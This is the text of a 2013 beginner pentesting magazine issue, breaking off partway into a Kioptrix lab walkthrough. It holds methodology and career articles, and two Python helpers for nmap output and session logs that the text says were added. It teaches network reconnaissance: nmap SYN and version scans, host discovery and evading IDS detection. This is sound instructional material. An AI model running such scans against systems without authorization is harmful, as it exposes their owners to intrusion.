PenTest StarterKit 2013


Cyber Security Auditing Software

Improve your Firewall Auditing

As a penetration tester you have to be an expert in multiple technologies. Typically you are auditing systems installed and maintained by experienced people, often protective of their own methods and technologies. On any particular assessment testers may have to perform an analysis of Windows systems, UNIX systems, web applications, databases, wireless networking and a variety of network protocols and firewall devices. Any security issues identified within those technologies will then have to be explained in a way that both management and system maintainers can understand.

The network scanning phase of a penetration assessment will quickly identify a number of security weaknesses and services running on the scanned systems. This enables a tester to quickly focus on potentially vulnerable systems and services using a variety of tools that are designed to probe and examine them in more detail, e.g. web service query tools. However, this is only part of the picture, and a more thorough analysis of most systems will involve having administrative access in order to examine in detail how they have been configured. In the case of firewalls, switches, routers and other infrastructure devices this could mean manually reviewing the configuration files saved from a wide variety of devices. Although various tools exist that can examine some elements of a configuration, the assessment would typically end up being a largely manual process. Nipper Studio is a tool that enables penetration testers, and non-security professionals, to quickly perform a detailed analysis of network infrastructure devices. Nipper Studio does this by examining the actual configuration of the device, enabling a much more comprehensive and precise audit than a scanner could ever achieve.

www.titania.com

With Nipper Studio penetration testers can be experts in every device that the software supports, giving them the ability to identify device, version and configuration specific issues without having to manually reference multiple sources of information. With support for around 100 firewalls, routers, switches and other infrastructure devices, you can speed up the audit process without compromising the detail.

You can customize the audit policy for your customer's specific requirements (e.g. password policy), audit the device to that policy and then create the report detailing the issues identified. The reports can include device specific mitigation actions and be customized with your own company's styling. Each report can then be saved in a variety of formats for management of the issues. Why not see for yourself, evaluate for free at titania.com

Ian has been working with leading global organizations and government agencies to help improve computer security for more than a decade. He has been accredited by CESG for his security and team leading expertise for over 5 years. In 2009 Ian Whiting founded Titania with the aim of producing security auditing software products that can be used by non-security specialists and provide the detailed analysis that traditionally only an experienced penetration tester could achieve. Today Titania's products are used in over 40 countries by government and military agencies, financial institutions, telecommunications companies, national infrastructure organizations and auditing companies, to help them secure critical systems.

www.titania.com

Dear PenTesters!

We are proud to announce a new line of our Magazine – PenTest StarterKit. It's a magazine dedicated especially (but not only) to newbies and pentesting enthusiasts who would like to gain more experience and knowledge.

Conducting a penetration test for the first time might be a big concern for some of you who haven't tried it yet. That's why we open this issue with the section 'How To Start', where you will find the article 'Basics of PenTest' by Nishant Raman, who describes how to start a penetration test. Yury Chemerkin, our expert who made one of the covers of PenTest Magazine, gives some tips in his article on how to begin a pentester career. The section closes with Francesco Perna's article 'Professional Penetration Testing: How to Get Started', where he presents security testing methodologies.

Next, you will find the article 'Penetration Testing with Nessus' by Dan Robel. There you will learn what kind of troubles penetration testers have to face nowadays.

From the article 'BackTrack for Pentesting?' by Lloyd Wilke, you will get to know that using BackTrack makes it easy for a pentester to get his/her hands on the required tools to do a good job in finding security exploits in systems.

In the article 'Network Scanning: The Basic Tools', Enrique Sanchez explains the basic techniques used under the hood of great scanners such as nmap. In his day-to-day job, the author is a member of the Accuvant LABS Enterprise Attack and Penetration Testing team.

Then you will have a chance to acquire knowledge about Blind Command Line Injection (BCLIi) while reading Chris Duffy's article.

From 'CSRF Testing and its Protection Using RequestRodeo', contributed by Nitin Goplani, you will learn more about Cross Site Request Forgery (CSRF), which is one of the most common attacks on the Internet nowadays.

Hitesh Choudhary, an ethical hacker, in his article 'Python for Coders and Pentesters', demonstrates how to write a web crawler in Python.

In the section 'Let's Talk About Security' you will find an article entitled 'Pentesting a Nation – Is Australia Safe From Attack?', where, thanks to its author Colin Renouf, you will have an opportunity to look at some of the wider issues related to penetration testing and security – the "A" (availability) in the CIA security triad.

Last but not least is an interview with Rod Soto, the winner of last year's Black Hat hacking competition, a security researcher and a board member of HackMiami. We are sure you will find this interview as educative as it is inspiring.

We hope you will enjoy your reading!

Kamil Sobieraj & PenTest Team

CONTENTS

HOW TO START

06 Basics of Pentest: A Lesson for Beginners
By Nishant Raman

How to start a pentest is a big concern and question in the mind of any beginner who is going to conduct a pentest for the first time. Knowing about the various tools is always an interesting part for any ethical hacker, but to begin any pentesting assignment you should have a better approach and plan.

10 Pentester Career: How to Begin?
By Yury Chemerkin

You will learn what to take into consideration when assessing your pentest knowledge. Is it a degree, skills, certifications or maybe knowledge of programming languages? Moreover, you will get answers to questions like: What to learn or what to do to become a pentester? How to improve your pentester skills? Finally, you will learn what skills each pentester should possess and how to gain them.

12 Professional Penetration Testing: How to Get Started?
By Francesco Perna

The first approach to penetration testing activities seems like black voodoo arts to anyone who hasn't ever considered computer security problems. The truth is that in these kinds of activities no magic art is involved and no supernatural power is necessary in order to proceed. All you need for successful penetration testing is a fully functional "/dev/brain", very specific technical preparation, strong knowledge of security testing methodologies, a little bit of fantasy and a lot of practice.

PENTESTING WITH TOOLS

20 Penetration Testing with Nessus
By Dan Robel

In the last 10 years, cybersecurity has become a household word, and due to the growth of critical infrastructure and an exponential increase in the related threat of cyber-attack, it dominates every conversation we have about securing this critical infrastructure. From this article you will learn what troubles penetration testers have to face nowadays.

26 BackTrack for Pentesting?
By Lloyd Wilke

BackTrack makes it easy for a pentester to get his/her hands on the required tools to do a good job in finding security exploits on systems. It also allows the so-called "script kiddies" access to professional tools that are so easy to use that they can exploit systems without understanding what has been achieved.

32 Network Scanning: The Basic Tools
By Enrique Sanchez

This article will try to explain the basic techniques used under the hood of great scanners such as nmap. This will allow the reader not only to have a better understanding of how network scanners work in the discovery phase, but also to be able to implement their own scanners or use other programs to gather this information in case nmap or other tools would trigger IDS signatures and the engagement requires not being caught by them (Red Team).

POTENTIAL ATTACKS & DEFENSE METHODS

46 Blind Command Line Injection
By Chris Duffy

Blind Command Line Injection (BCLIi) is when a web application allows operating system commands to be executed through it with no confirmation of execution. BCLIi is typically found in poorly coded applications that allow access to files or data through a web interface. Read this article to get more information about BCLIi.

50 CSRF Testing and its Protection Using RequestRodeo
By Nitin Goplani

Cross Site Request Forgery (CSRF) is one of the most common attacks on the Internet today. Attackers find it easy to exploit as it does not require any authentication information or session cookies, only that the user is authenticated to the application. Furthermore, it is possible on every platform and it does not matter which authentication type the application uses.

56 Python for Coders and Pentesters
By Hitesh Choudhary

The Python programming language was a gift to the Web world by Guido van Rossum. Most of the time InfoSec evangelists need to write their Proof of Concept (POC), we need to automate our attacks or customize some of our tools, and these tasks can create a lot of headaches.

LET'S TALK ABOUT SECURITY

58 Pentesting a Nation – Is Australia Safe From Attack?
By Colin Renouf

This article looks at some of the wider issues related to penetration testing and security – the "A" (availability) in the CIA security triad – and how an attack on inadequate national infrastructure could impact a global system.

INTERVIEW

62 Interview with Rod Soto
By PenTest Team

Rod Soto is a security researcher and board member of HackMiami. He is a regular speaker at hacking conferences all over the country on the topics of penetration testing tools and methods, as well as the topic of digital civil liberties. He will tell us about his experience in the pentest field.

StartKit 01/2013(01)

TEAM

Editor in Chief: Ewa Dudzic
Managing Editor: Kamil Sobieraj
Associate Editors: Patrycja Przybyłowicz, Ewa Duranc, Zbigniew Fiołna
Editorial Advisory Board: Jeff Weaver, Rebecca Wynn
Betatesters & Proofreaders: Vaman Amarjeet, Gregory Chrysanthou Balogun, Ayo TayoBalogun, Jeff Weaver, Amit Chugh, Pinto Elia, Ewa Duranc, Jeff Smith, Julian Estevez, Rod MacPherson, Scott Christie
Senior Consultant/Publisher: Paweł Marciniak
CEO: Ewa Dudzic
Art Director: Ireneusz Pogroszewski
DTP: Ireneusz Pogroszewski
Production Director: Andrzej Kuca

Publisher: Hakin9 Media
02-682 Warszawa, ul. Bokserska 1
Phone: 1 917 338 3631
www.pentestmag.com

Whilst every effort has been made to ensure the high quality of the magazine, the editors make no warranty, express or implied, concerning the results of content usage. All trade marks presented in the magazine were used only for informative purposes. All rights to trade marks presented in the magazine are reserved by the companies which own them.

DISCLAIMER!
The techniques described in our articles may only be used in private, local networks. The editors hold no responsibility for misuse of the presented techniques or consequent data loss.

HOW TO START

Basics of Pentest:
A Lesson for Beginners
This article is written for beginners who have just started their career in the security domain as pentesters and are planning to become successful ones. 'How to Start a Pentest' is a big concern and question in the mind of any beginner who is going to conduct a pentest for the first time.

Knowing about the various tools is always an interesting part for any ethical hacker, but to begin any pentesting assignment you should have a better approach and plan. This article will focus in depth on what approach should be taken to start a pentest.

Scenario

Very often, at the beginning of a pentest, you will face one of two situations:
• The organization that wants to conduct the pentest on their network provides you with just a list of IP addresses.
OR
• The organization provides you with an email address or domain name only.

Considering both scenarios, you will have a bunch of questions in your mind: how to start, what to do, what would be the first step, etc. So, without testing your zeal, let's see 'How to Start a Pentest'.

Approach

Knowing both scenarios, the very first step is to go through the methodology in order to set up the positive flow of your pentest activity. Let's have a closer look at the methodology of a pentest (see Figure 1).

Figure 1. Methodology of a pentest

Step 1: IPs

In scenario II, you have only an email ID or domain name. From here the very first thing you need to find out is the IP addresses registered to the organization for which you are conducting the pentest activity. To get the IP address details you can use various tools and websites, such as: www.whois.net, www.Yougetsignal.com, www.whois.sc, www.dnsstuff.com, etc.
After getting the IP address details you will have another question: should I do the pentest on all the registered IPs? The answer is 'NO'. You cannot decide at that moment. You will have to find all the active or usable IPs first. Remember that most organizations keep some of their IPs as spares, so there is a very big possibility that you will find fewer active IPs than registered IPs.
To find all the active IPs you can use various IP scanner tools, such as: Angry IP (see Figure 2), SuperScan, hping, etc.
Note that to get the exact number of active IPs you need to perform multiple scans, because there is a possibility that, during a scan, some of the devices are down or inactive. This should allow you to gather the information about all the active IPs.
To get further information about the organization's network infrastructure you can also visit websites with job offers and analyze the requirements related to the organization.

Example
If the organization has posted a requirement on a job website for an Oracle DBA and a Fortigate firewall specialist, this means that they use Oracle databases and Fortigate firewalls, so you can prepare your test plan accordingly and try to get more information about this in the next steps of the pentest.

Step 2: Port Scanning

This step is very important during the pentest activity. The previous step let you find the active IPs; now it is time to perform port scanning on those IPs. During port scanning you will not only gather information about ports, but most probably you will also get some details about services, the operating system, and the versions of the OS and services. For this purpose you can use tools like ZenMAP (see Figure 3), NMAP (see Figure 4), SuperScan, etc.
Once you have gathered the information about open ports, services and operating system versions, you need to do some exercise and R&D to collect, using your skills, further details about the operating system and services.
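Steps 1 and 2 above recommend several host-discovery passes (a host may be down during any one pass) and then a port, service and version scan of the active IPs. The following Python script is an added example, not code from the article: it merges several nmap grepable-output (-oG) passes into one inventory, flags hosts that answered only in some passes (so they get rescanned before the active list is fixed) and keeps the open ports with service and version per host. The scan text it parses is constructed sample data and the function names are my own.

```python
"""Merge several nmap -oG (grepable) passes into one host/port inventory.

Added example: Step 1 says to scan more than once because devices may be
down during a pass, and Step 2 collects ports, services and versions. The
two scan passes below are constructed samples in nmap's grepable format.
"""
from collections import defaultdict

# Constructed sample: two passes over the same /24. 192.168.1.12 is down in
# the second pass; 192.168.1.20 only answers in the second pass.
SCAN_PASSES = [
    """# Nmap 6.25 scan initiated (constructed sample, pass 1)
Host: 192.168.1.10 ()\tStatus: Up
Host: 192.168.1.10 ()\tPorts: 22/open/tcp//ssh//OpenSSH 5.3/, 80/open/tcp//http//Apache httpd 2.2/\tIgnored State: closed (998)
Host: 192.168.1.12 ()\tStatus: Up
Host: 192.168.1.12 ()\tPorts: 445/open/tcp//microsoft-ds///\tIgnored State: filtered (999)
# Nmap done (constructed sample)
""",
    """# Nmap 6.25 scan initiated (constructed sample, pass 2)
Host: 192.168.1.10 ()\tStatus: Up
Host: 192.168.1.10 ()\tPorts: 22/open/tcp//ssh//OpenSSH 5.3/, 80/open/tcp//http//Apache httpd 2.2/, 443/open/tcp//https//Apache httpd 2.2/\tIgnored State: closed (997)
Host: 192.168.1.20 ()\tStatus: Up
Host: 192.168.1.20 ()\tPorts: 1521/open/tcp//oracle//Oracle TNS listener/\tIgnored State: closed (999)
# Nmap done (constructed sample)
""",
]


def parse_grepable(text):
    """Parse one -oG pass into {ip: {port: (proto, service, version)}}.

    A host that is up but shows no open ports still appears with an empty
    dict, so it still counts as active.
    """
    hosts = {}
    for line in text.splitlines():
        if not line.startswith("Host: "):
            continue
        fields = line.split("\t")              # -oG fields are tab separated
        ip = fields[0].split()[1]               # "Host: <ip> (<name>)"
        hosts.setdefault(ip, {})
        for field in fields[1:]:
            if not field.startswith("Ports: "):
                continue
            for entry in field[len("Ports: "):].split(", "):
                # Entry layout: port/state/proto/owner/service/rpc info/version/
                parts = entry.split("/")
                if len(parts) < 7 or parts[1] != "open":
                    continue
                hosts[ip][int(parts[0])] = (parts[2], parts[4], parts[6])
    return hosts


def merge_passes(passes):
    """Union of all passes: how often each host answered, plus every open port seen."""
    seen = defaultdict(int)
    ports = defaultdict(dict)
    for text in passes:
        for ip, open_ports in parse_grepable(text).items():
            seen[ip] += 1
            ports[ip].update(open_ports)
    return {ip: {"seen": seen[ip], "ports": ports[ip]} for ip in seen}


def active_ips(inventory):
    """All hosts that answered in at least one pass, in numeric address order."""
    return sorted(inventory, key=lambda ip: tuple(int(o) for o in ip.split(".")))


def intermittent_ips(inventory, total_passes):
    """Hosts that were up in some passes but not all: rescan before deciding."""
    return sorted(ip for ip, rec in inventory.items() if rec["seen"] < total_passes)


if __name__ == "__main__":
    inv = merge_passes(SCAN_PASSES)
    for ip in active_ips(inv):
        rec = inv[ip]
        print(f"{ip} up in {rec['seen']}/{len(SCAN_PASSES)} passes")
        for port, (proto, service, version) in sorted(rec["ports"].items()):
            print(f"    {port}/{proto} {service} {version}".rstrip())
    print("rescan:", intermittent_ips(inv, len(SCAN_PASSES)))
```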

Step 3: Vulnerability Scan

Now you have to do the vulnerability scanning of each IP address. This will allow you to get information about the vulnerabilities pertaining to the operating system, services, and applications running on the devices or servers associated with the active IPs. For this purpose you can use network and application vulnerability scanner tools like Nessus, Retina, AppScan, Acunetix, etc.
Once the scanner has generated a report you need to analyze it deeply and understand the weaknesses or loopholes found in the report.

Step 4: Research and Exploitation

This step is a bit difficult. You need to exploit the loopholes which you have found during steps 2 & 3. The process of exploitation will let you compromise the server or device and gain access to it. To get this accomplished, you need to have deep hands-on experience with the Metasploit Framework and BackTrack.

Suggestions

To be a good pentester you should have deep theoretical as well as practical understanding. You need to get as much experience as possible with some of the tools mentioned (NMAP, Metasploit, BackTrack, vulnerability scanner tools, etc.). You should be active on information security related blogs and spend a good amount of time on R&D and vulnerability research. You need to keep yourself up to date regarding zero-day vulnerabilities and exploits. And never forget that it is your zeal for learning that will play the key role in your success.

Figure 2. Angry IP Scanner

Figure 3. ZenMap Port Scanner

Figure 4. Nmap Port Scanner

Nishant Raman

Nishant Raman is the Founder and Chairman of CydCon IT Solutions Pvt. Ltd., New Delhi, India. He has experience in ethical hacking and web application pentesting. Being a security consultant for the last seven years, he is continuously helping IT, banking and non-IT organizations to improve their application and network security. He is working not only for domestic clients, but is providing his consultancy all over the world.

Pescara
Via Colle Scorrano, 5
65100 Pescara
F. +39 0857992241
[email protected]

Roma
Piazza G. Marconi,15
00144 Roma
T. +39 0632803612
F. +39 0632803283

www.quantumleap.it

HOW TO START

Pentester Career:
How to Begin?
Some start by talking about the degree; others say that nothing but fundamentals matters. You can acquire a significant part of the whole body of knowledge even before college, or do nothing useful at all even after getting a degree.

This is not a discussion of how your degree affects your skills; it does not, because practical skills may only have something in common with 'fundamentals' if both are on the same path and lead you to the same goal. Not every country has such educational institutes (maybe Germany has). You are free to argue against both sides, or to choose your own way, where there is room to solve different problems instead of misplacing them. This case is often extended by certifications; they matter, no doubt, especially when you know that whoever hires you is looking for them. However, you may find another way to show them you can manage such projects, one that depends on your additional skills, such as programming. I mean that you can develop your own tools or exploits yourself, participate in open-source groups that aim at the same thing, improve a tool or exploitation mechanism or automate it, mix several tools, or even redevelop them. It helps to understand how OS components link and work together, as well as how to break into a system. In the debate about which languages must be learnt, there are two groups, depending on the OS (under Windows: C/C++, Assembler; under Linux/RedHat/CentOS: Python, Ruby). However, this does not mean you should limit yourself to these languages: software is developed in many other languages, and a program may have popular add-ons written by someone who prefers .Net or has to use it.

Besides, do not forget that you should not only develop things but pentest too. That does not mean you should stop improving your skills; there are many out-of-the-box tools or solutions you have to learn and use, like BackTrack. There will be a need to improve or customize them according to the network, system or other specifications. Being part of a team, like Hackers for Charity (http://www.hackersforcharity.org/), helps to collect all the skills across system security, network security, application security, etc. On the other hand, getting forensics skills may help too. Therefore, learning and practicing with home networks and corporate sandboxes, bypassing NAC and VLANs, and finding loopholes in isolated segments helps in understanding stacks, buffers and memory and their vulnerabilities. In addition, you can learn a specific technology such as AVR: this kind of programming involves C/C++ knowledge as well.
Anyway, first steps in this field might involve reading books, but almost all books (except those from the Syngress publishing house) are rewritten and redesigned versions of each other that bring old techniques and old tools. So, it is better to find books such as the shellcoder's and gray-hat coder's books, pentest guidelines (e.g. http://www.pentest-standard.org, http://www.vulnapps.com/) and standards (NIST SP 800-42). As said earlier, you cannot focus on a certain language, software or technology, so as not to end up with purely theoretical knowledge. No one loves Delphi, but enough tools for researching applications implement Delphi libraries (and are written in it too). You should collect information about every technology, system and software from any possible source:
• Infosecurity blogs and news (like http://www.vulnapps.com/ or http://exploit-exercises.com/)
• Books and ebooks (like The Art of Software Security Assessment, or The Art of Exploitation)
• Vulnerability sites (like http://www.exploitdb.com/)
• Security conferences/events (every possible one, not only top known ones such as DefCon)
• Templates and cheat sheets (http://pentestmonkey.net/category/cheat-sheet)
• Special guidelines and frameworks (like OffSec guidelines)
It is quite important to have all of these skills (and not only them), because the key difference between such a tester and someone else is the ability to answer and explain attack vectors and potential attack paths, and to give discreet information tailored to each person you interact with. It means don't overload the CEO with full-detail technical reports generated by Nessus or another tool. As final thoughts, you should have different broad skills in:
• Network solutions (software, protocols, and hardware);
• Techniques of attacking and defending IDS, firewalls, AV, embedded and third-party security software;
• Top known tools and software for gathering data;
• Forensics and intelligence techniques to get evidence;
• Human security techniques (social engineering and physical security);
• Participating in CTFs and conferences;
• Simply being involved, to gain and share knowledge with smart guys.
Good luck,

Yury Chemerkin

Currently in the postgraduate program at RSUH on a Cloud Security thesis. Experience in Reverse Engineering, Software Programming, Cyber & Mobile Security Research, Documentation, and as a contributing Security Writer.

HOW TO START

Professional
Penetration Testing:
How to Get Started
The first approach to penetration testing activities seems like black voodoo arts to anyone who hasn't ever considered computer security problems. The truth is that in these kinds of activities no magic art is involved and no supernatural power is necessary in order to proceed.

All you need for successful penetration testing is a fully functional /dev/brain, very specific technical preparation, strong knowledge of security testing methodologies, a little bit of fantasy and a lot of practice.
Many think that penetration testing is an activity reserved only for hackers. This is partially true: a good hacker could be a penetration tester, but penetration test activities are a completely different story from hacking. When talking about hacking, there's no applicable rule; the limit to the "activity" resides only in the hacker's imagination. A hacker doesn't follow any publicly available methodology, doesn't need to be clear in the vulnerability explanation, and also doesn't have to write reports! Hackers just hack to reach their own objectives in the way they prefer. Contrary to hacking, made for fun, for research or in any of its forms, penetration tests are meant for companies and organizations that need either to verify whether their security level meets certain requirements (state regulations, company policy, international standards and so on) or to evaluate the risks related to the findings. That's why, in order to be effective, a penetration test activity must be executed with formalisms understood by the Customer, both in the test execution and in the way the identified vulnerabilities are reported.

In this article you will learn some of the basics of penetration testing. First of all, a little bit of penetration test theory will be discussed, then some basic techniques used during a penetration test will be shown through a practical approach applied to a system vulnerable by design. I have assumed that the reader is familiar at least with the basic concepts of security and TCP/IP. The practical examples are made using the commonly available security tools shipped with the Linux distro BackTrack 5 R3 [1] against the Kioptrix VM (level 1) [2]. Although BackTrack isn't a new trend in penetration testing distros, we decided to use it due to the large number of tutorials that a beginner can find on the Internet. Obviously, you don't have to use it. If you feel more comfortable using Kali, BackBox, Debian, Slackware, Ubuntu, one of a hundred other Linux distributions, OS X or Windows, then use it.

What is a Penetration Test
and what is it for

A penetration test could be defined as a method used to evaluate the security level of a set of assets. The goal of a penetration test, despite the name, is no longer to break or penetrate into a system. Instead, it is to identify, through a scientific methodology, the security level of the evaluated assets. I'm talking about assets instead of computers, networks and systems because, in a 'holistic' perspective, a penetration test isn't necessarily intended for technological stuff. Below are listed the main advantages of following a scientific methodology:
• penetration tests are conducted thoroughly and the results are consistent: if anyone repeats the penetration test using the same methodology on the same asset, he or she should (net of errors) obtain the same results;
• results leave no room for interpretation and what is asserted can be demonstrated through the evidence collected during the analysis. Furthermore, penetration test results are measurable in a quantitative way that depends on the adopted methodology;
• the posture towards the penetration test complies with the law. This is really important, especially if something goes wrong. It's crucial that at least the following legal aspects are met:
  • a penetration test may only occur after a clear analysis of the regional laws both for the security professional and for the Company or Organization being tested;
  • a penetration test may only occur after the signature of a written permission by the Customer. I used the term 'written permission' because a permission sent by e-mail, and, in some countries, even by fax, isn't enough to protect you and your Company from lawsuits. Consider consulting a lawyer to define the terms of the written permission.
Remember that during a penetration test the security professional is legally responsible for his actions, so, quoting a friend of mine, 'Cover your ass!'.
There are several kinds of penetration tests, and each one's methodology is different from the others. The common denominator between these different methodologies is the information provided to the security professional and to the customer's employees: the less information is shared, the more reliable the test will be in simulating a real threat.

Penetration Test Methodologies

There are several methodologies to conduct a successful penetration test. Depending on the methodology, the different steps of the penetration test, such as posture review, reporting of the findings or risk evaluation, may vary. To my knowledge, the most widely used methodologies are the following ones:

OSSTMM [3]

The Open Source Security Testing Methodology Manual (OSSTMM) is a peer-reviewed manual of security testing and analysis released by ISECOM (the Institute for Security and Open Methodologies). The OSSTMM concerns operational security and proposes a scientific method to measure how well security works. Besides technical aspects, OSSTMM gives serious consideration to the legal and ethical aspects related to security tests. ISECOM also provides a set of professional certifications related to the methodology;

ISSAF [4]

The Information Systems Security Assessment Framework (ISSAF), released by OISSG (Open Information Systems Security Group), provides validation for bottom-up security strategies, such as penetration testing, as well as top-down approaches, such as the standardization of an audit checklist for information policies;

OWASP [5]

The Open Web Application Security Project (OWASP) testing guide, released by the OWASP Project, is a methodology focused on web application penetration testing. The OWASP methodology also proposes its own risk analysis strategy.
The choice of methodology is really important as it deeply affects the way you work: it is really important to deeply understand a chosen methodology before applying it. Each methodology requires a different way of proceeding, collecting information, reporting the findings and evaluating the related risks. To clarify, the previously listed methodologies are only an example and I don't want to imply that they are better than other existing methodologies: every methodology has its own strengths and weaknesses and it is your responsibility to understand whether it fits your needs.

Rules of Engagement

Methodologies define a way to approach a penetration test safely and professionally. Depending on the adopted methodology, the way to approach the penetration test may be slightly different. Regardless of the adopted methodology, please be sure to comply at least with the following rules of engagement:
• Penetration test scope definition: you need to verify with the Customer the scope of the penetration test in terms of number of targets, acceptable practices, involved parties and time window. During the scope definition you should be able to identify any obviously insecure or unstable system and should avoid testing them. It is crucial to have this information to define the necessary effort and the involved perimeter;
• Contract terms definition: the contract should also include a line of communication and emergency contacts. One of the most important aspects in professional penetration testing is confidentiality. Regardless of the existence of a non-disclosure agreement, you must not reveal any information acquired from the customer nor the results of testing to third parties not identified by the customer as referents for the penetration test. Although a penetration test conducted professionally should not be destructive, you need to clearly state in the contract the dangers, risks, and limitations related to the penetration test activities. The contract must include the written authorization to proceed with the security tests. Be sure to include in the written authorization signed by the Customer at least the information related to the perimeter, the acceptable practices, the time window and the source of analysis (like the originating IP address for the attack simulations, telephone numbers used during war dialing, etc.);
• Technical activities: first of all, and this is a golden and inviolable rule, you must operate respecting the law. Remember that you're the only one responsible for that. Trace all your activities, both on your system and on the Customer's ones, in order to protect yourself in case of trouble. Keep all information acquired during the test safe and secure in order to guarantee confidentiality. Don't be destructive and don't carry out any intentional denial of service attack against the target. Never use tools that you don't know properly: you can cause potential damage and this is unacceptable. If in doubt about the possibility of causing damage with a test, inform the Customer first and obtain the authorization, preferably in written form, to carry out the specific test. If you discover a breach during your activities, suspend the penetration test immediately and inform the Customer. Last but not least, at the end of a penetration test, clean the targets of anything that you may have installed during the analysis;
• Reporting: the report is what, eventually, summarizes the outcome of a penetration test. It should contain all the issues discovered during the penetration test along with the evidence and the necessary steps to reproduce these issues. The report should also contain a practical solution to the reported issues. The report must be transmitted maintaining its confidentiality end-to-end, and the customer must know the implications of uncontrolled diffusion of the information inside it.

Pentest Simulation Scenario

Let's start with a simulation of a penetration test. I am assuming at this point that all the legal and non-technical aspects are sorted out (such as the Customer having signed the contract and written authorizations). The scope of this simulated penetration test is a single system connected to the Customer's network and your task is to start with an analysis of the system. In my simulation the target (that is, the kioptrix) has IP address 192.168.1.105 and my system (that is, BackTrack) has IP address 192.168.1.107.

Penetration Test Simulation: Setup the
Logging

The first activity in a test is to set up the logging environment for both the shell and the network traffic. In my setup I connect through SSH to my BackTrack system and directly log all the commands sent to the shell. On a Windows system you can use PuTTY [6], or something equivalent, to log the whole session. Figure 1 shows how to configure PuTTY to enable session logging.

Figure 1. PuTTY session logging

Page 14

http://pentestmag.com

Under Linux and Unix-like systems it is possible to log the session using the OpenSSH [7] client and the tee command, as I show in Listing 1. Once logged into the BackTrack host, I suggest that you customize your shell prompt to include information such as the date and time. This is a useful trick to piece together the timeline of the simulated attack. Listing 2 shows how to set up this customized prompt using the bash [8] shell.
The next step is to set up the logging of network traffic; for this task I use the tcpdump utility. Usually I log the traffic of the whole target subnet in order to identify any spurious or unexpected response. In this specific case, because the systems are directly connected, I only log the network traffic involving the kioptrix system. Listing 3 shows how to use tcpdump to log the network traffic.
After these preliminary steps, it is time to proceed with the analysis.
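The timeline that the timestamped prompt makes possible can be rebuilt from the tee log automatically. The following Python script is an added example, not code from the article: it assumes the prompt format of Listing 2 and a constructed sample log (host name bt, commands mirroring the listings), and lists each command with its timestamp, its output line count and an upper bound on how long it ran, which is what you need to line the shell log up with the tcpdump capture.

```python
"""Rebuild a command timeline from a session log recorded with tee.

Added example, not code from the article. It parses the log produced by the
setup in Listings 1 and 2 (ssh piped through tee, bash prompt set to
"[\\d \\t \\u@\\h:\\w]$ "), so every command line looks like
"[Wed Apr 24 01:58:02 root@bt:~]$ nmap ...", and attaches the output lines that
follow each prompt to that command. bash's \\d carries no year, so the caller
passes it. The host name "bt" and the sample log are constructed.
"""
import re
from dataclasses import dataclass, field
from datetime import datetime
from typing import List, Optional

# Constructed sample: three commands as they would appear in ~/ssh-output.log.
SAMPLE_LOG = (
    "[Wed Apr 24 01:58:02 root@bt:~]$ nmap -sS -sV -P0 -O -n -p 1-65535 192.168.1.105\r\n"
    "Starting Nmap 6.25 ( http://nmap.org ) at 2013-04-24 01:58 CEST\r\n"
    "Nmap scan report for 192.168.1.105\r\n"
    "Host is up (0.00030s latency).\r\n"
    "Nmap done: 1 IP address (1 host up) scanned in 22.02 seconds\r\n"
    "[Wed Apr 24 01:58:31 root@bt:~]$ rpcclient -I 192.168.1.105 -w MYGROUP -U \"%\"\r\n"
    "rpcclient $> quit\r\n"
    "[Wed Apr 24 02:01:05 root@bt:~]$ exit\r\n"
)

# A prompt line as produced by PS1="[\d \t \u@\h:\w]$ " followed by the typed command.
PROMPT = re.compile(
    r"^\[(?P<dow>[A-Z][a-z]{2}) (?P<mon>[A-Z][a-z]{2}) (?P<day>\d{1,2}) "
    r"(?P<time>\d{2}:\d{2}:\d{2}) (?P<user>[^@\s]+)@(?P<host>[^:\s]+):(?P<cwd>[^\]]*)\]\$ (?P<cmd>.*)$"
)


@dataclass
class Step:
    when: datetime
    user: str
    host: str
    cwd: str
    command: str
    output: List[str] = field(default_factory=list)


def parse_session_log(text: str, year: int) -> List[Step]:
    """Split the log into commands; lines before the first prompt (banner, motd) are ignored."""
    steps: List[Step] = []
    for raw in text.splitlines():
        line = raw.rstrip("\r")  # the remote pty sends CR LF and tee keeps both
        m = PROMPT.match(line)
        if m:
            when = datetime.strptime(f"{m['mon']} {m['day']} {year} {m['time']}",
                                     "%b %d %Y %H:%M:%S")
            steps.append(Step(when, m["user"], m["host"], m["cwd"], m["cmd"]))
        elif steps:
            steps[-1].output.append(line)
    return steps


def elapsed_seconds(steps: List[Step]) -> List[Optional[int]]:
    """Upper bound on each command's run time: the gap to the next prompt (None for the last)."""
    gaps: List[Optional[int]] = []
    for cur, nxt in zip(steps, steps[1:]):
        gaps.append(int((nxt.when - cur.when).total_seconds()))
    if steps:
        gaps.append(None)
    return gaps


def timeline(steps: List[Step]) -> List[str]:
    """One report line per command, ready to be matched against the pcap timestamps."""
    lines = []
    for step, secs in zip(steps, elapsed_seconds(steps)):
        bound = f"<= {secs}s" if secs is not None else "n/a"
        lines.append(f"{step.when:%Y-%m-%d %H:%M:%S} {step.user}@{step.host}:{step.cwd} $ "
                     f"{step.command}  [{len(step.output)} output lines, {bound}]")
    return lines


if __name__ == "__main__":
    for row in timeline(parse_session_log(SAMPLE_LOG, 2013)):
        print(row)
```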

Penetration Test Simulation: Services
Enumeration

I am assuming here that you are familiar with the TCP/IP protocol suite. The first step to analyze the security of the target is to identify the services that it exposes. To identify these services I use the nmap port scanner [9]. Specifically, I perform a full port scan with the SYN scan technique, in order to also identify services that are on non-standard ports. Listing 4 shows how to use nmap to perform this task.

Listing 1. SSH session logging
$ ssh [email protected] | tee ~/ssh-output.log

Listing 2. Custom prompt
$ export PS1="[\d \t \u@\h:\w]$ "

Listing 3. Network traffic logging
$ tcpdump -i eth0 -n -s0 -w PT-LOG.pcap host 192.168.1.105

Listing 4. TCP ports/services enumeration
$ nmap -sS -sV -P0 -O -n -p 1-65535 192.168.1.105
Starting Nmap 6.25 ( http://nmap.org ) at 2013-04-24 01:58 CEST
Nmap scan report for 192.168.1.105
Host is up (0.00030s latency).
Not shown: 65529 closed ports
PORT      STATE SERVICE     VERSION
22/tcp    open  ssh         OpenSSH 2.9p2 (protocol 1.99)
80/tcp    open  http        Apache httpd 1.3.20 ((Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b)
111/tcp   open  rpcbind     2 (RPC #100000)
139/tcp   open  netbios-ssn Samba smbd (workgroup: MYGROUP)
443/tcp   open  ssl/http    Apache httpd 1.3.20 ((Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b)
32768/tcp open  status      1 (RPC #100024)
MAC Address: 08:00:27:A9:9E:29 (Cadmus Computer Systems)
Device type: general purpose
